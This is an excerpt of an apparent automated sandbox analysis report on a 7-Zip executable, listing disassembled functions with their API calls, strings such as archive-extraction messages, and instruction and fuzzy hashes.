                              • Instruction Fuzzy Hash: 5521D62320464191CA60EB15E98176E7721F7D5BE0F449227FF5E43A68DF2CC986EB01
                              Function 00FCE24E Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                              • String ID:
                              • API String ID: 352749199-0
                              • Opcode ID: 3bc03dd1b1b73e9071d32506f7fc1c6f2074b6c84ad5a41d6ab94059779c88a3
                              • Instruction ID: a48bfb5d0a2edf92896873bbf98ac228550b4e3a3180b32476ac1b1555c71350
                              • Opcode Fuzzy Hash: 3bc03dd1b1b73e9071d32506f7fc1c6f2074b6c84ad5a41d6ab94059779c88a3
                              • Instruction Fuzzy Hash: 17314F72614787CADB60DF15E991BAD7772F7847A4F40023AE65943AA4CF3CD845EB00
                              Function 00FCE286 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                              • String ID:
                              • API String ID: 352749199-0
                              • Opcode ID: 4afe18664bfbb2c87daaaa07b71c9015096e4dbab92b590f771811bd17689861
                              • Instruction ID: de1f4e71bc8e52fc1016ad094984e14124259cc2b6fba798a51a3e0d29b88d61
                              • Opcode Fuzzy Hash: 4afe18664bfbb2c87daaaa07b71c9015096e4dbab92b590f771811bd17689861
                              • Instruction Fuzzy Hash: A3213931614B87C6EB60DF14E950B6D7772FB847A4F40023AE66943AA4CF3CD845EB00
                              Function 00FCE23A Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                              • String ID:
                              • API String ID: 352749199-0
                              • Opcode ID: 4afe18664bfbb2c87daaaa07b71c9015096e4dbab92b590f771811bd17689861
                              • Instruction ID: de1f4e71bc8e52fc1016ad094984e14124259cc2b6fba798a51a3e0d29b88d61
                              • Opcode Fuzzy Hash: 4afe18664bfbb2c87daaaa07b71c9015096e4dbab92b590f771811bd17689861
                              • Instruction Fuzzy Hash: A3213931614B87C6EB60DF14E950B6D7772FB847A4F40023AE66943AA4CF3CD845EB00
                              Function 00FCE219 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                              • String ID:
                              • API String ID: 352749199-0
                              • Opcode ID: 4afe18664bfbb2c87daaaa07b71c9015096e4dbab92b590f771811bd17689861
                              • Instruction ID: de1f4e71bc8e52fc1016ad094984e14124259cc2b6fba798a51a3e0d29b88d61
                              • Opcode Fuzzy Hash: 4afe18664bfbb2c87daaaa07b71c9015096e4dbab92b590f771811bd17689861
                              • Instruction Fuzzy Hash: A3213931614B87C6EB60DF14E950B6D7772FB847A4F40023AE66943AA4CF3CD845EB00
                              Function 00FB3D32 Relevance: 8.9, APIs: 7, Instructions: 120COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 3447f2870b6d53f2272a2c7eb0d0ab99a4122f4f43c70cf63459b61d067e4340
                              • Instruction ID: 65691189a0c36e06b923083a805fe099f525b2878df837d4e9b66c8f6b969193
                              • Opcode Fuzzy Hash: 3447f2870b6d53f2272a2c7eb0d0ab99a4122f4f43c70cf63459b61d067e4340
                              • Instruction Fuzzy Hash: 6D41B133244B4991CB50EF26D85029E7760FB89B98F444022EF4E47728DF3CC9A6EB50
                              Function 00FA96F8 Relevance: 8.9, APIs: 7, Instructions: 107COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 34494f8055e4ac842c8fee3ddeb30b0204388ad4d84a894665da7a39221f3768
                              • Instruction ID: 7f0fca5d3a3edf0ee82fa6f58c5bf326bd4e55d1f884fd208f42cfeb713c0975
                              • Opcode Fuzzy Hash: 34494f8055e4ac842c8fee3ddeb30b0204388ad4d84a894665da7a39221f3768
                              • Instruction Fuzzy Hash: C741BB6222858552CB60EB24EC5179EB360FBD57E4F809223F6DE875B9DF2CC506DB01
                              Function 00F9CF10 Relevance: 8.8, APIs: 7, Instructions: 62COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 6090aba66b1dc48e1abda49c94261c98d8ff034174972193e8d4cf115a61bc83
                              • Instruction ID: f8b55973d31853a128a2ef2e0153e93bdc59fc864c484985fa3a6189a0b0496b
                              • Opcode Fuzzy Hash: 6090aba66b1dc48e1abda49c94261c98d8ff034174972193e8d4cf115a61bc83
                              • Instruction Fuzzy Hash: 7A118627740B49869F60BE22D95106D3310EB55BF4B4C8622EF2D1B790DF19C8729360
                              Function 00FA1784 Relevance: 8.8, APIs: 7, Instructions: 53COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: caaeff056fdabb2c2e7321f671ea6a354ebf0e5937cb7c37bed008342a00664b
                              • Instruction ID: 649e59e362da86cabc9f1cc4066ce090241d3b1ac5e8b685ff777415bfc27f81
                              • Opcode Fuzzy Hash: caaeff056fdabb2c2e7321f671ea6a354ebf0e5937cb7c37bed008342a00664b
                              • Instruction Fuzzy Hash: 7101E167B01A84898BA1EE26CC1002C2321EB82FF4F2E4226DE1D1F388DF29CC52D350
                              Function 00F9CA94 Relevance: 8.8, APIs: 7, Instructions: 45COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 7fbbcc2e99cb0114e1a3119e233bbbd991d18d9e1ce76fad5144490d7254e9df
                              • Instruction ID: f84a91b437060e50710401ecf261dd99f44cc14c6258d510eea55cae76c5bbfd
                              • Opcode Fuzzy Hash: 7fbbcc2e99cb0114e1a3119e233bbbd991d18d9e1ce76fad5144490d7254e9df
                              • Instruction Fuzzy Hash: 7311DB22301B4585DF94EF35C8A122C7320FBC5FA8B5586229E2E5B665CF29CC5AD391
                              Function 00FB2732 Relevance: 7.6, APIs: 6, Instructions: 150COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 22a96e9d9d4722407fb0a5c82a3c95a0bc4945a29bd40f847b14d035822603d1
                              • Instruction ID: d16804aa0f12edb1a13db31c4d6817fd0d3dc109803b0909294478f761f393d7
                              • Opcode Fuzzy Hash: 22a96e9d9d4722407fb0a5c82a3c95a0bc4945a29bd40f847b14d035822603d1
                              • Instruction Fuzzy Hash: 2A514F63200A4591CF50EF25D8916AD3361F7C5F94FA09513DA0E87728DF7CC99AEB42
                              Function 00FC738C Relevance: 7.6, APIs: 6, Instructions: 77COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 757d814618d8855f7859b7308ee0aa145b0e50a47704a47a6e8009e6b379919c
                              • Instruction ID: cc6c4de668a34babed97bac841b906bd79597a748fb583ff1e46702261fd088c
                              • Opcode Fuzzy Hash: 757d814618d8855f7859b7308ee0aa145b0e50a47704a47a6e8009e6b379919c
                              • Instruction Fuzzy Hash: 03217C27B02B4585CB29EF35D95172D7720EB85FA4F29822ADE2D1B798CF39C8019310
                              Function 00FC0CDC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FC0D6D
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$memset
                              • String ID: Extracting archive: $Open$Testing archive:
                              • API String ID: 3543874852-295398807
                              • Opcode ID: 18c3264e37cd08eff7b5bc60e9fc1ea2811d52f6f279732d5a37a01967141fb5
                              • Instruction ID: 272606a8e6186691ac371d7dad9e2cef4c6bf83fe0911201bc9fd4a195361027
                              • Opcode Fuzzy Hash: 18c3264e37cd08eff7b5bc60e9fc1ea2811d52f6f279732d5a37a01967141fb5
                              • Instruction Fuzzy Hash: F4116022702A8784DB95DB69DD857F82361E755F98F1884378E0D4A255DE2984CBE310
                              Function 00FC2AD0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FC2AF3
                              • fputs.MSVCRT ref: 00FC2B03
                              • free.MSVCRT ref: 00FC2B50
                                • Part of subcall function 00FC29A8: fputs.MSVCRT ref: 00FC29ED
                                • Part of subcall function 00FC29A8: fputs.MSVCRT ref: 00FC2A7B
                                • Part of subcall function 00FC29A8: free.MSVCRT ref: 00FC2AAB
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free
                              • String ID: =
                              • API String ID: 3873070119-2525689732
                              • Opcode ID: 7f5f4739c8a74bee139a7b4d1d7c537d8cc3c3030b42f5feef9f930dadc4e1fa
                              • Instruction ID: 9d03b9cdd9ef35872536a9aab07826eeda9d8b5cf3ca674fb1cda4a153b95303
                              • Opcode Fuzzy Hash: 7f5f4739c8a74bee139a7b4d1d7c537d8cc3c3030b42f5feef9f930dadc4e1fa
                              • Instruction Fuzzy Hash: 5DF0D69230460151DA60EB26EE517793322DBC5FF4F089223AD6D07BE8DE2CC946A702
                              Function 00F88830 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 119COMMON
                              Download Yara Rule
                              APIs
                              • free.MSVCRT ref: 00F889D7
                                • Part of subcall function 00F864E8: free.MSVCRT ref: 00F865C5
                                • Part of subcall function 00F86E88: GetLastError.KERNEL32 ref: 00F86EA3
                                • Part of subcall function 00F86E88: free.MSVCRT ref: 00F86EF4
                                • Part of subcall function 00F86E88: free.MSVCRT ref: 00F86F2D
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ErrorLast
                              • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                              • API String ID: 408039514-394804653
                              • Opcode ID: 88ec8297f9e23e0ec126f7f7c0500b9844928d1bdfebefa7bf21fb12f3e5a416
                              • Instruction ID: 0130d5a202738daef4bbb9cebb466ae60459626e512a1588e1490599532cdb4f
                              • Opcode Fuzzy Hash: 88ec8297f9e23e0ec126f7f7c0500b9844928d1bdfebefa7bf21fb12f3e5a416
                              • Instruction Fuzzy Hash: 5341B02720578594DB61AF3598113FE2721A785FE8F8C4132CF8A4B355DF78C94AE3A1
                              Function 00F87924 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 108COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • doc dot wbk docx docm dotx dotm docb wll wwl xls xlt xlm xlsx xlsm xltx xltm xlsb xla xlam ppt pot pps ppa ppam pptx pptm potx potm ppam ppsx ppsm sldx sldm , xrefs: 00F879C6
                              • :Zone.Identifier, xrefs: 00F879DD
                              • Cannot set length for output file, xrefs: 00F8797F
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: doc dot wbk docx docm dotx dotm docb wll wwl xls xlt xlm xlsx xlsm xltx xltm xlsb xla xlam ppt pot pps ppa ppam pptx pptm potx potm ppam ppsx ppsm sldx sldm $:Zone.Identifier$Cannot set length for output file
                              • API String ID: 1294909896-1552544479
                              • Opcode ID: 95d128e0864b841a27fa4d131d8ed5442c0accbf7f060dd31cc92dc6e18bbb30
                              • Instruction ID: ede5d878a3cd5cf020a4a3f20a15ef4d7e2aa636e84a407b4799bba75456fbc0
                              • Opcode Fuzzy Hash: 95d128e0864b841a27fa4d131d8ed5442c0accbf7f060dd31cc92dc6e18bbb30
                              • Instruction Fuzzy Hash: 6941A1326087C181DF61EF35D8403ED6721E781BA8F585272EAAD4B6AADE2CC54AD710
                              Function 00FCE200 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 70d3439854e7706087ba43be2736c122568b0a749180fca4c848fbc153217cb3
                              • Instruction ID: ee951db0c70c4d0836d3a7a1f6a936a23b8b0df46bd0f3fbf47813c2b441338d
                              • Opcode Fuzzy Hash: 70d3439854e7706087ba43be2736c122568b0a749180fca4c848fbc153217cb3
                              • Instruction Fuzzy Hash: 83311A72514B47C6D760DF14E990B697771F7817A4F40423AE65943AA4DF3CD845EB00
                              Function 00F76FCC Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AttributesFilefree
                              • String ID:
                              • API String ID: 1936811914-0
                              • Opcode ID: 2438c4d46c2d3bedd8f8d32da497e8a1ec4bb712b86c7c0aadf2914d42ad0083
                              • Instruction ID: 48f8875936fc4137d3fa98734ba7011d3fae78b8645978843dafbfde7ab05628
                              • Opcode Fuzzy Hash: 2438c4d46c2d3bedd8f8d32da497e8a1ec4bb712b86c7c0aadf2914d42ad0083
                              • Instruction Fuzzy Hash: 8101A72371874141DA30AB21989037E13649BC67F4F588323EE6D876A5DF2DCD86F702
                              Function 00F786C8 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AttributesFilefree
                              • String ID:
                              • API String ID: 1936811914-0
                              • Opcode ID: f3a7bfe2fbeb8eaaa86e59d7df9951e83bc08cde47471fedabe96c3adb9c62b3
                              • Instruction ID: 79bc9fa4cf652b3260b1c768ac105ab2ae7fdd84cfa04d0481ce42b124cd32be
                              • Opcode Fuzzy Hash: f3a7bfe2fbeb8eaaa86e59d7df9951e83bc08cde47471fedabe96c3adb9c62b3
                              • Instruction Fuzzy Hash: 59F0A92264464545C530A734ADD832D2321A7867F4F648322EA7E8B7E4DF1CCD47E702
                              Function 00F9C694 Relevance: 5.1, APIs: 4, Instructions: 142COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              • Opcode ID: 3d4e3d313a12ffc0cbc2ef8ed08529013286d5a7e115bc917af8f605999ee648
                              • Instruction ID: 9a82e5081bdab631b2f5109976b624be36b148adbc66b6be70cb05aa4c672f62
                              • Opcode Fuzzy Hash: 3d4e3d313a12ffc0cbc2ef8ed08529013286d5a7e115bc917af8f605999ee648
                              • Instruction Fuzzy Hash: AC518E72704A8097DE30EB16E88029D7320F789BE4F448227DB8D47B59DF38D4A5DB40
                              Function 00F98580 Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 6e3fada83e1e8ae34f328cb636aa625eae3db3a74b5cde4ffc27f04f2bbbb36f
                              • Instruction ID: abd263f89640fa3bf39cf5315c540d773797393807ed69b581102c98fc49aa73
                              • Opcode Fuzzy Hash: 6e3fada83e1e8ae34f328cb636aa625eae3db3a74b5cde4ffc27f04f2bbbb36f
                              • Instruction Fuzzy Hash: AC11D36360468490DF20EB21E84556E7331E7C2BF5F88C212EE5D0B6A5DF6CC98AE702
                              Function 00F79A94 Relevance: 4.6, APIs: 3, Instructions: 75fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F7960C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,00000000,?,?,00000000,?,00000003,00000003), ref: 00F7961E
                              • CreateFileW.KERNELBASE ref: 00F79B09
                              • CreateFileW.KERNEL32 ref: 00F79B5C
                              • free.MSVCRT ref: 00F79B6A
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
